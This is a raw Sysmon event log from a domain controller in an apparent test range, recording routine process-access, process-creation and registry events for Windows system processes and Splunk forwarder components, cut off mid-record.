16:13:10.842{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.842{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5696-6008-1307-00000000A301}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.842{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5696-6008-1307-00000000A301}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.843{7901BC46-5696-6008-1307-00000000A301}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.233{7901BC46-5696-6008-1207-00000000A301}67087808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.092{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5696-6008-1207-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.092{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.092{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.092{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.092{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.092{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5696-6008-1207-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.092{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5696-6008-1207-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.093{7901BC46-5696-6008-1207-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:11.514{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5697-6008-1407-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:11.514{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:11.514{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:11.514{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:11.514{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:11.514{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5697-6008-1407-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:11.514{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5697-6008-1407-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:11.515{7901BC46-5697-6008-1407-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:10.999{7901BC46-5696-6008-1307-00000000A301}46401228C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000031344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:13:40.576{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ef47-0x37703865) 10341000x800000000000000031361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.966{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-56CF-6008-1607-00000000A301}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.966{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.966{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.966{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.966{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.966{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-56CF-6008-1607-00000000A301}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.966{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-56CF-6008-1607-00000000A301}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 